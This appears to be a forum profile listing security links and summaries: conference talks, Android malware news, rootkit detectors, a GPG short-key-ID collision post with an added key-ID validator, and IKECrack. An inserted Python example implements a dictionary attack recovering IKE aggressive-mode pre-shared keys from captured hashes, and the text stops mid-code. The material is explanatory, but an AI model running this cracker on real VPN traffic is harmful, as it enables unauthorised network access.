Everything posted by Nytro

  1. BlackHat USA 2011: SSL And The Future Of Authenticity
     Speaker: Moxie Marlinspike
     In the early 90's, at the dawn of the World Wide Web, some engineers at Netscape developed a protocol for making secure HTTP requests, and what they came up with was called SSL. Given the relatively scarce body of knowledge concerning secure protocols at the time, as well as the intense pressure that everyone at Netscape was working under, their efforts can only be seen as incredibly heroic. But while it's amazing that SSL has endured for as long as it has, some parts of it -- particularly those concerning Certificate Authorities -- have always caused some friction, and have more recently started to cause real problems.
     This talk will provide an in-depth examination of the current problems with authenticity in SSL, discuss some of the recent high-profile SSL infrastructure attacks in detail, and cover some potential strategies for the future. It will conclude with a software release that aims to definitively fix the disintegrating trust relationships at the core of this fundamental protocol.
     For more information or to download the video visit: Black Hat
  2. 28c3: 802.11 Packets in Packets
     Travis Goodspeed: 802.11 Packets in Packets - A Standard-Compliant Exploit of Layer 1
     http://www.youtube.com/watch?v=thUM323ufG0
     New to 2011, Packet-in-Packet exploits allow for injection of raw radio frames into remote wireless networks. In these exploits, an attacker crafts a string that when transmitted over the air creates the symbols of a complete and valid radio packet. When radio interference damages the beginning of the outer packet, the receiver is tricked into seeing only the inner packet, allowing a frame to be remotely injected. The attacker requires no radio, and injection occurs without a software or hardware bug.
     This lecture presents the first implementation of Packet-in-Packet injection for 802.11B, allowing malicious PHY-Layer frames to be remotely injected. The attack is standards-compliant and compatible with all vendors and drivers. Unlike the simpler implementations for 802.15.4 and 2FSK, 802.11B presents a number of unique challenges to the PIP implementer. A single packet can use up to three symbol sets and three data-rates, switching rates once within the header and a second time for the beginning of the body. Additionally, a 7-bit scrambler randomizes the encoding of each packet, so the same string of text can be represented 128 different ways at the exact same rate and encoding.
     As a demo, we intend to present a malicious string which can be embedded in any file with lots of slack space, such as an ISO image. When this image is downloaded over HTTP on 802.11B, beacon frames will be injected. For the demo, we will be injecting the SSID stack buffer overflow frames from Uninformed Volume 6.
     Source: https://www.youtube.com/user/28c3#p/u/10/thUM323ufG0
  3. 28c3: Defending mobile phones
     Karsten Nohl, Luca Melette: Defending mobile phones
     http://www.youtube.com/watch?v=XK_Jx1993Eg
     Cell phone users face an increasing frequency and depth of privacy intruding attacks. Defense knowledge has not scaled at the same speed as attack capabilities. This talk intends to revert this imbalance. The most severe attack vectors on mobile phones are due to an outdated technology base that lacks strong cryptographic authentication or confidentiality. Given this discrepancy between protection need and reality, a number of countermeasures were developed for networks and phones to better protect their users. We explain the most important measures and track their deployment. Furthermore, we will release tools to measure the level of vulnerability of networks. Sharing the results of these measurements will hopefully create problem awareness and demand for more security by phone users around the world.
     Source: https://www.youtube.com/user/28c3#p/u/5/XK_Jx1993Eg
  4. Mathias Payer: String Oriented Programming - Circumventing ASLR, DEP, and Other Guards
     The protection landscape is changing and exploits are getting more and more sophisticated. Exploit generation toolkits can be used to construct exploits for specific applications using well-defined algorithms. We present such an algorithm for leveraging format strings and introduce string oriented programming. String oriented programming takes format string exploits to the next level and turns an intrusion vector that needs hand-crafted exploits into arbitrary code execution. Similar to return oriented programming or jump oriented programming, string oriented programming does not rely on existing code but concatenates gadgets in the application using static program analysis. This talk presents an algorithm and a technique that takes a vulnerable application that contains a format string exploit as a parameter and constructs a format string exploit that can be used to inject a dynamic jump oriented programming dispatcher into the running application. String oriented programming circumvents ASLR, DEP, and ProPolice.
     Source: https://www.youtube.com/user/28c3#p/u/3/bjcm391lkyA
  5. Dan Kaminsky: Black Ops of TCP/IP 2011
     Source: https://www.youtube.com/user/28c3#p/u/1/KYS0XHzxOsY
     Worth watching; it covers many interesting things.
  6. The "Anonymous" guys = Gigi Becali, more like.
  7. These same people were saying that they were not the authors of the attack, because it does not fall within their area of activity, that there is nothing ethical in this action. Well now, I can put on a mask too and say that the CIA is behind the attack, throw in the "We are Anonymous" line, and done, the whole nation believes what I say.
  8. I also bought myself two classic books today:
     - F.M. Dostoevsky - Crime and Punishment
     - Vladimir Nabokov - Lolita
  9. Official Android Market hosts many Malware Games
     F-Secure researchers recently found malware in the Android Market disguised as free versions of popular games. Disguising malware as a free version of a popular game (such as Cut the Rope and Assassin’s Creed) seems to be a popular tactic that the bad guys are using to scam users of Google’s Android Market app store.
     Overnight more malware appeared in Google’s official app repository. The Trojanized games have been uploaded by a company calling itself Eldar Limited. This is the second time in two weeks malware disguised as free games has been uploaded to the Android Market.
     Google's app police managed to detect this fraud and quickly removed it from the Android Market. While the apps are still listed on AppBrain and AndroidZoom, the links will direct users back to the official Android Market where they have already been removed.
     "These have now been removed by Google, but their appearance in the official Android Market in the first place is worrying. Not only is Google putting Android users into contact with malware, it is also allowing the brand names of reputable companies to be tarnished by letting the bad guys upload this stuff to the Android Market in the first place." Zdnet posted.
     F-Secure posted a tip to help you figure out whether a free app is genuine or not: A useful tip for users out there is to search for the paid version of the app and take note of the developer’s name. If the name on both paid and free versions matches, then it is very likely to be a safe app. Otherwise, don’t proceed with the download.
     Source: http://thehackernews.com/2011/12/official-android-market-host-many.html
  10. Remote Windows Kernel Exploitation - A step into Ring0
      Blackhat US 05.
      Author: Barnaby Jack
      Download: www.blackhat.com/presentations/bh-usa-05/BH_US_05-Jack_White_Paper.pdf
  11. Short key IDs are bad news (with OpenPGP and GNU Privacy Guard)
      Mon, 26 Dec 2011
      Summary: It is important that we (the Debian community that relies on OpenPGP through GNU Privacy Guard) stop using short key IDs. There is no vulnerability in OpenPGP and GPG. However, using short key IDs (like 0x70096AD1) is fundamentally insecure; it is easy to generate collisions for short key IDs. We should always use 64-bit (or longer) key IDs, like: 0x37E1C17570096AD1 or 0xEC4B033C70096AD1.
      TL;DR: This now gives two results:
          gpg --recv-key 70096AD1
      Some background, and my two keys
      Years ago, I read dkg's instructions on migrating the Debian OpenPGP infrastructure. It told me that the time and effort I had spent getting my key into the strong set wasn't as useful as I thought it had been. I felt deflated. I had put in quite a bit of effort over the years to strongly-connect my key to a variety of signatures, and I had helped people get their own keys into the strong set this way. If I migrated off my old key and revoked it, I'd be abandoning some people for whom I was their only link into the strong set. And what fun it was to first become part of the strong set! And all the eyebrows I raised when I told people I was going to meet up with people I met on a website called Biglumber... I even made it my Facebook.com user ID.
      So if I had to generate a new key, I decided I had better really love the short key ID. But at that point, I already felt pretty attached to the number 0x70096AD1. And I couldn't come up with anything better. So that settled it: no key upgrade until I had a new key whose ID is the same as my old key.
      That dream has become a reality. Search for my old key ID, and you get two keys!
          $ gpg --keyserver pgp.mit.edu --recv-key 0x70096AD1
          gpg: requesting key 70096AD1 from hkp server pgp.mit.edu
          gpg: key 70096AD1: public key "Asheesh Laroia <asheesh@asheesh.org>" imported
          gpg: key 70096AD1: public key "Asheesh Laroia <asheesh@asheesh.org>" imported
          gpg: no ultimately trusted keys found
          gpg: Total number processed: 2
          gpg: imported: 2 (RSA: 1)
      A neat stunt abusing --refresh-keys
      Thanks to a GNU Privacy Guard bug, it is super easy to get my new key. Let's say that, like many people, you only have my old key on your workstation:
          $ gpg --list-keys | grep 70096AD1
          pub 1024D/70096AD1 2005-12-28
      Just ask GPG to refresh:
          $ gpg --keyserver pgp.mit.edu --refresh-keys
          gpg: refreshing 1 key from hkp://pgp.mit.edu
          gpg: requesting key 70096AD1 from hkp server pgp.mit.edu
          gpg: key 70096AD1: public key "Asheesh Laroia <asheesh@asheesh.org>" imported
          gpg: key 70096AD1: "Asheesh Laroia <asheesh@asheesh.org>" not changed
          gpg: Total number processed: 2
          gpg: imported: 1 (RSA: 1)
          gpg: unchanged: 1
          gpg: no ultimately trusted keys found
      Now you have two:
          $ gpg --list-keys | grep 70096AD1
          pub 1024D/70096AD1 2005-12-28
          pub 4096R/70096AD1 2011-03-11
      There is a bug filed in GNU Privacy Guard about this. It has a patch attached. There is, at the moment, no plan for a new release.
      A faster attack, but nothing truly new
      My friend Venkatesh tells me there is an apocryphal old Perl script that could be used to generate key ID collisions. Here in the twenty-first century, l33t h4x0rz like Georgi Guninski are trying to create collisions. In May 2010, "halfdog" posted a note to the full-disclosure list that generates PGP keys with chosen short key IDs. I haven't benchmarked or tested that tool, but I have used a different tool (private for now) that can generate collisions in a similar fashion. It takes about 3 hours to loop through all key IDs on a dinky little netbook.
      You don't have to use any of these tools. You can just rent time on an elastic computing service or a botnet, or your own personal computer, and generate keys until you have a match. I think that it's easy to under-estimate the seriousness of this problem: tools like the PGP Key Pathfinder should be updated to only accept 64-bit (or longer) key IDs if we want to trust their output.
      My offer: I will make you a key
      I've been spending some time wondering: What sort of exciting demonstration can I create to highlight that this is a real problem? Some ideas I've had:
      - Publish a private/public key pair whose key ID is the same as Phil Zimmermann's, original author of PGP
      - Publish a private/public key pair whose key ID is the same as Werner Koch's, maintainer of GNU Privacy Guard
      - Publish a set of public keys that mimic the entire PGP strong set, except where I control the private key of all these keys
      The last one would be extremely amusing, and would be a hat-tip to some work discussed in Raph Levien's Google Tech Talk about Advogato.
      For now, here is my offer: If you send me a request signed with a key in the strong set, I will create a 4096-bit RSA public/private key pair whose 32-bit key ID is one greater than yours. So if you are 0x517DD4E4 I will generate 0x517DD4E5. I will post the keys here, along with a note about who requested it, and instructions on how to import them into your keyring. (Note: I will politely decline to create a new key whose 32-bit key ID would create a collision; apologies if your key ID is just one away from someone else's.)
      P.S. The prize for best sarcastic retort goes to Ian Jackson. He said, "I should go and create a lot of keys with your key ID. I'll set the real name to 'Not Asheesh Laroia' so everyone is totally clear about what is going on."
      Source: Short key IDs are bad news (with OpenPGP and GNU Privacy Guard) :: Asheeshworld
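Added example (not from the original post or from GnuPG): it builds a V4 RSA public-key packet from constructed toy parameters, computes its fingerprint per RFC 4880, derives the 64-bit and 32-bit key IDs from the fingerprint, shows that the post's two long IDs 0x37E1C17570096AD1 and 0xEC4B033C70096AD1 collapse to the same short ID 70096AD1, and gives a validator that refuses short IDs before they reach a command like gpg --recv-key. The RSA modulus, exponent and timestamp are constructed values, not a real key.

```python
import hashlib


def mpi(value: int) -> bytes:
    """Encode a non-negative integer as an OpenPGP MPI (RFC 4880 3.2):
    two-octet big-endian bit count, then the big-endian magnitude."""
    bits = value.bit_length()
    return bits.to_bytes(2, "big") + value.to_bytes((bits + 7) // 8, "big")


def v4_rsa_public_key_body(created: int, n: int, e: int) -> bytes:
    """Body of a V4 public-key packet for RSA (RFC 4880 5.5.2): version 4,
    4-octet creation time, algorithm id 1 (RSA), then the MPIs n and e."""
    return b"\x04" + created.to_bytes(4, "big") + b"\x01" + mpi(n) + mpi(e)


def v4_fingerprint(body: bytes) -> bytes:
    """RFC 4880 12.2: V4 fingerprint = SHA-1(0x99 || two-octet body length || body)."""
    return hashlib.sha1(b"\x99" + len(body).to_bytes(2, "big") + body).digest()


def long_key_id(fingerprint: bytes) -> str:
    """64-bit key ID: the low 8 octets of the fingerprint."""
    return fingerprint[-8:].hex().upper()


def short_key_id(fingerprint: bytes) -> str:
    """32-bit 'short' key ID: the low 4 octets, i.e. the tail of the long ID.
    Only 2^32 values exist, which is why the post can collide it."""
    return fingerprint[-4:].hex().upper()


def normalize_key_id(key_id: str) -> str:
    """Accept a key ID as typed on the gpg command line (with or without 0x)
    and refuse anything shorter than a 64-bit ID or a full 160-bit fingerprint.
    Returns uppercase hex without the 0x prefix."""
    hex_id = key_id[2:] if key_id.lower().startswith("0x") else key_id
    if len(hex_id) not in (16, 40) or any(c not in "0123456789abcdefABCDEF" for c in hex_id):
        raise ValueError(f"refusing short or malformed key ID: {key_id!r}")
    return hex_id.upper()


def is_acceptable_key_id(key_id: str) -> bool:
    """Boolean form of normalize_key_id for use in scripts and checks."""
    try:
        normalize_key_id(key_id)
        return True
    except ValueError:
        return False


def share_short_id(id_a: str, id_b: str) -> bool:
    """True when two long key IDs (or fingerprints) collapse to the same 32-bit ID."""
    return normalize_key_id(id_a)[-8:] == normalize_key_id(id_b)[-8:]


# Constructed toy RSA parameters (NOT a real key) so the example runs offline.
TOY_N = int("C0FFEE" * 32, 16)   # 768-bit pattern standing in for a modulus
TOY_E = 65537
TOY_CREATED = 1325548800          # arbitrary creation timestamp


def demo() -> dict:
    """Derive fingerprint and both key IDs for the toy key, and check the post's pair."""
    fpr = v4_fingerprint(v4_rsa_public_key_body(TOY_CREATED, TOY_N, TOY_E))
    return {
        "fingerprint": fpr.hex().upper(),
        "long_id": long_key_id(fpr),
        "short_id": short_key_id(fpr),
        # The two keys from the post: different 64-bit IDs, identical 32-bit ID.
        "post_keys_collide": share_short_id("0x37E1C17570096AD1", "0xEC4B033C70096AD1"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
    for candidate in ("70096AD1", "0x37E1C17570096AD1"):
        print(f"{candidate}: {'ok' if is_acceptable_key_id(candidate) else 'rejected'}")
```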
  12. RootkitRevealer v1.71
      By Bryce Cogswell and Mark Russinovich
      Published: November 1, 2006
      Introduction
      RootkitRevealer is an advanced rootkit detection utility. It runs on Windows XP (32-bit) and Windows Server 2003 (32-bit), and its output lists Registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit. RootkitRevealer successfully detects many persistent rootkits including AFX, Vanquish and HackerDefender (note: RootkitRevealer is not intended to detect rootkits like Fu that don't attempt to hide their files or registry keys). If you use it to identify the presence of a rootkit please let us know!
      The reason that there is no longer a command-line version is that malware authors have started targeting RootkitRevealer's scan by using its executable name. We've therefore updated RootkitRevealer to execute its scan from a randomly named copy of itself that runs as a Windows service. This type of execution is not conducive to a command-line interface. Note that you can use command-line options to execute an automatic scan with results logged to a file, which is the equivalent of the command-line version's behavior.
      What is a Rootkit?
      The term rootkit is used to describe the mechanisms and techniques whereby malware, including viruses, spyware, and trojans, attempt to hide their presence from spyware blockers, antivirus, and system management utilities. There are several rootkit classifications depending on whether the malware survives reboot and whether it executes in user mode or kernel mode.
      Persistent Rootkits
      A persistent rootkit is one associated with malware that activates each time the system boots. Because such malware contains code that must be executed automatically each system start or when a user logs in, it must store code in a persistent store, such as the Registry or file system, and configure a method by which the code executes without user intervention.
      Memory-Based Rootkits
      Memory-based rootkits are malware that has no persistent code and therefore does not survive a reboot.
      User-mode Rootkits
      There are many methods by which rootkits attempt to evade detection. For example, a user-mode rootkit might intercept all calls to the Windows FindFirstFile/FindNextFile APIs, which are used by file system exploration utilities, including Explorer and the command prompt, to enumerate the contents of file system directories. When an application performs a directory listing that would otherwise return results that contain entries identifying the files associated with the rootkit, the rootkit intercepts and modifies the output to remove the entries. The Windows native API serves as the interface between user-mode clients and kernel-mode services, and more sophisticated user-mode rootkits intercept file system, Registry, and process enumeration functions of the Native API. This prevents their detection by scanners that compare the results of a Windows API enumeration with that returned by a native API enumeration.
      Kernel-mode Rootkits
      Kernel-mode rootkits can be even more powerful since, not only can they intercept the native API in kernel-mode, but they can also directly manipulate kernel-mode data structures. A common technique for hiding the presence of a malware process is to remove the process from the kernel's list of active processes. Since process management APIs rely on the contents of the list, the malware process will not display in process management tools like Task Manager or Process Explorer.
      Download: http://download.sysinternals.com/Files/RootkitRevealer.zip
      Source: RootkitRevealer
      Via: Top 3 Tools To Remove Rootkits and Prevent Them from Infecting Your PC
  13. Sophos Anti-Rootkit
      Free rootkit detection and removal tool
      Important note
      We are currently working to enhance the detection power of the Sophos Anti-Rootkit Tool to better find and remove the latest forms of rootkits. This updated version will be available to download in February 2012. Should you have any questions about the current version of this tool, please visit our SophosFreeTalk Community.
      Rootkit scanning, detection and removal
      Our free software, Sophos Anti-Rootkit, scans, detects and removes any rootkit that is hidden on your computer using advanced rootkit detection technology. Rootkits can lie hidden on computers and remain undetected by antivirus software. Although new rootkits can be prevented from infecting the system, if you had any rootkits before you installed your antivirus, they may never be revealed. Removing rootkits without compromising system integrity is particularly challenging and needs to be done with care.
      Simplified management
      Using Sophos Anti-Rootkit is easy. Whether you use its simple graphical user interface or run it from the command line, you can easily detect and remove any rootkits on your computer.
      Easy to use
      Sophos Anti-Rootkit provides an extra layer of protection, by safely and reliably detecting and removing any rootkit that might have hidden itself on your system.
      Stay free of rootkits
      As part of its complete protection of endpoint computers, Sophos Endpoint Security and Data Protection has an integrated detection functionality that removes rootkits and prevents them from being installed onto your desktops, laptops and servers.
      Download: http://www.sophos.com/en-us/products/free-tools/sophos-anti-rootkit/download.aspx
      Source: Sophos Anti-Rootkit - Free Rootkit Detection and Removal Tool
      Via: Top 3 Tools To Remove Rootkits and Prevent Them from Infecting Your PC
  14. Trend Micro™ RootkitBuster™ 5.00 Beta
      Released: 2011-08-15
      Download: http://www.trendmicro.com/ftp/products/rootkitbuster/RootkitBuster_5.00.1041.zip
      Source: Top 3 Tools To Remove Rootkits and Prevent Them from Infecting Your PC
  15. Kindle Fire gets a bite of Android 4.0 Ice Cream Sandwich
      December 26, 2011 | Devindra Hardawar
      Well that didn’t take very long. Amazon’s Kindle Fire tablet — which you’ve likely seen gifted quite a bit this holiday season — has been hacked to run a “pre-alpha” version of Android 4.0 Ice Cream Sandwich. You can thank the intrepid hackers over at the xda-developers forum for the release, which marks the first time Android 4.0 has hit the Kindle Fire.
      A hack such as this is likely the only way Kindle Fire owners can get their hands on Android 4.0. Given the hefty hardware requirements for Android 4.0 devices, plus Amazon’s need for a highly customized user interface on the Kindle Fire, you’ll likely never see an official Ice Cream Sandwich release on the tablet.
      The hack, which is based on the custom Android firmware CyanogenMod 9, is certainly far from complete. Audio and graphical glitches (especially while playing videos) abound, and touch screen interaction seems fairly unresponsive, according to the above video from Liliputing. Still, it’s a mighty first step for Kindle Fire hackers, and it’s likely the first of many such releases from various development groups. Given its $200 price and wide availability, the Kindle Fire is the new target for any hacker looking to make a name for themselves.
      Via The Verge
      Source: Kindle Fire gets a bite of Android 4.0 Ice Cream Sandwich | VentureBeat
  16. Cuckoo Sandbox - Automated Malware Analysis System
      In three words, Cuckoo Sandbox is a malware analysis system. Its goal is to provide you a way to automatically analyze files and collect comprehensive results describing and outlining what such files do while executed inside an isolated environment. It's mostly used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine. But it can do much more... It's up to you to discover what and how.
      Some of the results that Cuckoo generates are:
      - Trace of performed relevant win32 API calls
      - Dump of network traffic generated during analysis
      - Creation of screenshots taken during analysis
      - Dump of files created, deleted and downloaded by the malware during analysis
      - Trace of assembly instructions executed by malware process
      In addition, Cuckoo allows you to:
      - Automate submission of analysis tasks
      - Create analysis packages to define custom operations and procedures for performing an analysis
      - Run multiple virtual machines concurrently
      - Script the process and correlation of analysis results data
      - Script and automate the generation of reports in the format you prefer
      Download
      Current Cuckoo Sandbox's version is 0.3.
      http://www.cuckoobox.org/downloads/0.3/cuckoo_0.3.tar.gz
      Docs: http://www.cuckoobox.org/doc/0.3/latex/CuckooSandbox.pdf
      Demo:
      Source: Cuckoo Sandbox
  17. GoDaddy loses 21,000 domains in a day
      By Natalie Weinstein on Dec 27, 2011
      Domain registrar Go Daddy lost over 21,000 domains yesterday. It could be a coincidence--or it could be the result of the company's PR debacle over its support for the Stop Online Piracy Act.
      Yesterday, Go Daddy actually reversed course and dropped its support for the controversial legislation. "Go Daddy will support it when and if the Internet community supports it," Go Daddy CEO Warren Adelman announced in a statement.
      SOPA, introduced in Congress this fall, would make it easier for the Justice Department to shut down sites allegedly dedicated to piracy. An anti-Go Daddy thread on social site Reddit led to the creation of Godaddyboycott.org, a site set up to let people amass their disapproval with the company's support of SOPA.
      While 21,054 domains transferred out Friday of Domaincontrol.com--which is managed by Go Daddy--it is only fair to note that 20,034 transferred in the same day, according to domain tracker Dailychanges.com. According to techie site TheNextWeb.com, though, the transfers-out have been building over the course of the week, with 8,800 reported on Monday and 14,500 on Wednesday.
      Go Daddy did not immediately respond to CNET's request for comment.
      Via CNET
      Source: GoDaddy loses 21,000 domains in a day - Crave - CNET Asia
  18. Audit Windows Passwords With Password Security Scanner
      Keeping track of all accounts and passwords can be a daunting task for some users. One reason for that is that most use multiple applications that may require passwords. Think of desktop email clients, instant messengers or web browsers for instance. Even if you are using a password manager like KeePass, you will usually have programs that save account information and passwords for you. That’s a problem if you want an overview of all passwords, or want to make sure that all are secure.
      The new Nirsoft application Password Security Scanner has been designed to audit Windows passwords. The first release supports auditing passwords stored in Internet Explorer, Mozilla Firefox, MSN, Microsoft Outlook, Windows Live Mail, and dialup and VPN passwords. The program scans the operating system for all supported programs and displays all passwords that it finds in a list.
      Password Security Scanner lists the item name (usually a domain name), the type (browser, email), the application the password was found in, the username, password length, the password strength, and even the type of characters used by the password.
      Firefox users need to disable the master password if set up, as it blocks access to the password list. This is done under Options > Security > Master Password in the browser.
      The password length and strength give detailed information about a password’s security. The information may for instance be used to change weak passwords on the system. Keep in mind though that all passwords read by the application are accessible openly on the system. Someone with direct access to the PC could retrieve the account information regardless of password length. Users can however use the information to delete passwords that are out in the open on their system. While that may not always be a practicable solution, it may work in some cases.
      The data can be exported into text, csv and xml files, and HTML reports.
      Windows users can download the portable program from the official program website.
      Source: Audit Windows Passwords With Password Security Scanner
  19. This is what a 5MB hard drive looked like in 1956
      26th December 2011 by Zee
      ‘In September 1956 IBM launched the 305 RAMAC, the first ‘SUPER’ computer with a hard disk drive (HDD). The HDD weighed over a ton and stored 5 MB of data.’
      Texomatube via Retronaught (Thanks @Atul)
      Source: What a 5MB Hard Drive Looked Like in 1956
  20. Hacktivity 2011 - Yaniv Miron: SCADA Dismal or bang-bang SCADA
      Source: Hacktivity 2011 - Yaniv Miron: SCADA Dismal or bang-bang SCADA on Vimeo
  21. Naval researchers pioneer TCP-based spam detection
      A group of researchers has built a SpamAssassin plug-in that detects spam by TCP usage
      By Joab Jackson, December 23, 2011, 4:39 PM
      A group of researchers from the U.S. Naval Academy has developed a technique for analyzing email traffic in real-time to identify spam messages as they come across the wire, simply using information from the TCP (Transmission Control Protocol) packets that carry the messages.
      This approach could be a useful addition to the arsenal of today's spam-fighting techniques, observers argue, in that, unlike other typical spam fighting approaches, the content of the email does not have to be scanned.
      The work "advanced both the science of spam fighting and ... worked through all the engineering challenges of getting these techniques built into the most popular open-source spam filter," said Massachusetts Institute of Technology computer science research affiliate Steve Bauer, who was not involved with the work. "So this is both a clever bit of research and genuinely practical contribution to the persistent problem of fighting spam."
      Researchers Robert Beverly, Georgios Kakavelakis and Joel Young built a plug-in for the SpamAssassin mail filter, called SpamFlow, that incorporates their analysis techniques. They presented their work at the Usenix Large Installation System Administration (LISA) conference earlier this month in Boston.
      In the paper that accompanied the presentation, the researchers showed that spam email blasts have certain characteristics at the networking transport layer. Signal analysis of factors such as timing, packet reordering, congestion and flow control can reveal the work of a spam-spewing botnet. "A lot of spam comes from spambots, which are sending as fast as they can and congesting their local uplink," Beverly said. "So you can detect them by looking really hard at the TCP stream."
      Thus far, earlier techniques developed for analyzing spam at the network transport layer have been offline, which is to say, the email traffic is analyzed as a batch, and the results can be used later. The naval researchers have developed an architecture for analyzing network traffic as it comes over the wire.
      For the implementation, they used the SpamAssassin email filter. SpamAssassin has a plug-in architecture for incorporating new filtering techniques. "We have a daemon that captures all the packets and looks at timing and other congestion characteristics of the traffic stream," Beverly said. The plug-in can learn to identify and detect spam without human intervention. In tests, SpamFlow was able to correctly identify spam over 95 percent of the time, after a reception of 1,000 emails.
      The ability to detect a spam message without actually examining the contents of the message would be handy in a number of situations, noted Bruce Davie, a Cisco fellow and visiting lecturer at MIT. Davie is familiar with though not involved in the work. An Internet service provider could apply the detection algorithm without violating users' privacy. It can be used to detect messages that are encrypted, such as those traveling over an encrypted link. It can also be used to detect other forms of malicious traffic, such as port scans from botnet hosts. "Overall, I see it as a generally useful tool in the fight against malicious traffic," Davie said. "You can combine it with traditional anti-spam techniques to improve accuracy."
      Currently, the team is beta testing the software at a number of locations. They plan to release it as open-source software afterward. The U.S. National Science Foundation funded part of this work, under the Software Development for Cyberinfrastructure (SDCI) program.
      Source: Naval researchers pioneer TCP-based spam detection | ITworld
  22. Sandcat Pro v4.2.8 adds NoSQL Injection detection
      By MaxiSoler on 27 December 2011 in Tools with No Comments
      Sandcat combines Syhunt’s state-of-the-art, multi-process scanning technologies with the incredibly fast Lua language to perform remote web application security scans. While spidering a web site and hunting vulnerabilities, Sandcat emulates a modern, HTML 5-aware web browser, making sure every web application gets fully tested.
      Changelog v4.2.8
      This version adds techniques for detecting vulnerabilities in web applications using NoSQL database engines and web systems supporting server-side JavaScript execution. This includes NoSQL injection, blind NoSQL injection & Denial-of-Service vulnerabilities. Also included are enhanced versions of the Sandcat Code scanner with source code checks for these specific vulnerability classes, and an article (Time-Based NoSQL Injection, available here) that highlights additional risks involving server-side JavaScript execution not restricted to NoSQL database engines.
      Download: http://www.syhunt.com/?n=Sandcat.Download
      Source: Sandcat Pro v4.2.8 adds NoSQL Injection detection
  23. [h=3]IKECrack[/h]IKECrack is an open source IKE/IPSec authentication crack tool. This tool is designed to bruteforce or dictionary attack the key/password used with Pre-Shared-Key [PSK] IKE authentication. The open source version of this tool is to demonstrate proof-of-concept, and will work with RFC 2409 based aggressive mode PSK authentication. Our SourceForge development area is at IKECrack | Free Security & Utilities software downloads at SourceForge.net
[h=4]Presentation Materials and Additional Tools[/h] My ToorCon 2K2 preso on IKE hacking can be downloaded here. The IKEProber tool mentioned in the preso can be downloaded here.
[h=4]IKE Aggressive Mode BruteForce Summary[/h] Aggressive Mode IKE authentication is composed of the following steps:
1 - Initiating client sends encryption options proposal, DH public key, random number [nonce_i], and an ID in an un-encrypted packet to the gateway/responder.
2 - Responder creates a DH public value, another random number [nonce_r], and calculates a HASH that is sent back to the initiator in an un-encrypted packet. This hash is used to authenticate the parties to each other, and is based on the exchanged nonces, DH public values, the initiator ID, other values from the initiator packet, and the Pre-Shared-Key [PSK].
3 - The Initiating client sends a reply packet also containing a HASH, but this response is normally sent in an encrypted packet.
IKECrack utilizes the HASH sent in step 2, and attempts a realtime bruteforce of the PSK. This involves a HMAC-MD5 of the PSK with nonce values to determine the SKEYID, and a HMAC-MD5 of the SKEYID with DH pubkeys, cookies, ID, and SA proposal. In practice, SKEYID and HASH_R are calculated with the Hash cipher proposed by the initiator, so could actually be either SHA1 or MD5 in HMAC mode.
[h=4]Project Details[/h] Author: Anton T. Rager
IKECrack utilizes components from the following OpenSource/PublicDomain programs:
MDCrack
HiFn Linux Drivers - HiFn makes one of the better commercial encryption/compression accelerators. I have access to 7751 based PCI cards, and plan to use one for offloading MD5, SHA1, DES, and 3DES
Ron Rivest's MD5
Simeon Pilgrim's Reverse MD5
MD5 and HMAC-MD5 PerlMods
libpcap
[h=4]Performance[/h] Initial testing with Perl based IKECrack shows numbers of 18,000 tests per second with a PIII 700, and can bruteforce 3 chars of ucase/lcase/0-9 in 13 seconds. MDCrack [a MD5 bruteforce tool] can achieve 1.5 million keys per second with pure MD5 and a PIII 700. PSK bruteforcing consists of 4 MD5's, and 4 64 byte XORs....but should still be able to achieve 375,000 IKE keys per second. Preliminary tests in C have shown 26,000 keys per second with un-optimized routines. I'm hoping that Simeon Pilgrim's MD5 routines will speed this up a bit more.
[h=4]Cool Links[/h] Other projects we are considering integrating into IKECrack: dkbf - An open source distributed NT LANMan/Hash cracker using MPI - An IKECrack cluster!
Download: http://sourceforge.net/projects/ikecrack/files/latest/download Sursa: IKECrack - Bruteforce crack for IPSec
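The derivation the IKECrack summary above describes, as an added example that is not IKECrack's own code or Anton Rager's. It follows RFC 2409 for PSK authentication: SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), with prf being HMAC over whichever hash (MD5 or SHA1) the initiator proposed. Everything in the "capture" is constructed inline to stand in for the fields a sniffer would pull from the two cleartext aggressive-mode packets; the field sizes, the sample PSK and the wordlist are assumptions, not data from the page. The point it makes is why aggressive mode is weak: every input to HASH_R except the PSK crosses the wire in the clear, so a passive observer can test candidate PSKs offline.

```python
import hmac
import random

# Added example (editor's, not IKECrack's). Reproduces the RFC 2409
# aggressive-mode PSK derivation and runs a dictionary attack against it:
#   SKEYID = prf(PSK, Ni_b | Nr_b)
#   HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
# prf is HMAC with the hash from the initiator's proposal ("md5" or "sha1").
# All "captured" values are constructed here, not taken from a real exchange.


def skeyid(psk: bytes, nonce_i: bytes, nonce_r: bytes, hash_name: str = "md5") -> bytes:
    """SKEYID for pre-shared-key authentication: HMAC(PSK, Ni_b | Nr_b)."""
    return hmac.new(psk, nonce_i + nonce_r, hash_name).digest()


def hash_r(skey: bytes, cap: dict, hash_name: str = "md5") -> bytes:
    """HASH_R, which the responder sends in the clear in aggressive-mode message 2."""
    msg = cap["gxr"] + cap["gxi"] + cap["cky_r"] + cap["cky_i"] + cap["sai_b"] + cap["idir_b"]
    return hmac.new(skey, msg, hash_name).digest()


def crack_psk(cap: dict, wordlist, hash_name: str = "md5"):
    """Dictionary attack: return the first candidate whose recomputed HASH_R
    matches the captured one, or None when the wordlist is exhausted."""
    for candidate in wordlist:
        sk = skeyid(candidate.encode(), cap["nonce_i"], cap["nonce_r"], hash_name)
        if hmac.compare_digest(hash_r(sk, cap, hash_name), cap["hash_r"]):
            return candidate
    return None


def make_capture(psk: bytes, hash_name: str = "md5", seed: int = 1) -> dict:
    """Constructed stand-in for what a sniffer sees in the two cleartext packets.
    Sizes follow a typical DH group 2 (1024-bit) negotiation; bytes are random.
    The responder's HASH_R is computed with the real PSK, as a gateway would."""
    rnd = random.Random(seed)

    def rb(n: int) -> bytes:
        return bytes(rnd.getrandbits(8) for _ in range(n))

    cap = {
        "cky_i": rb(8), "cky_r": rb(8),        # ISAKMP initiator/responder cookies
        "gxi": rb(128), "gxr": rb(128),        # DH public values (g^xi, g^xr)
        "nonce_i": rb(20), "nonce_r": rb(20),  # Ni_b, Nr_b
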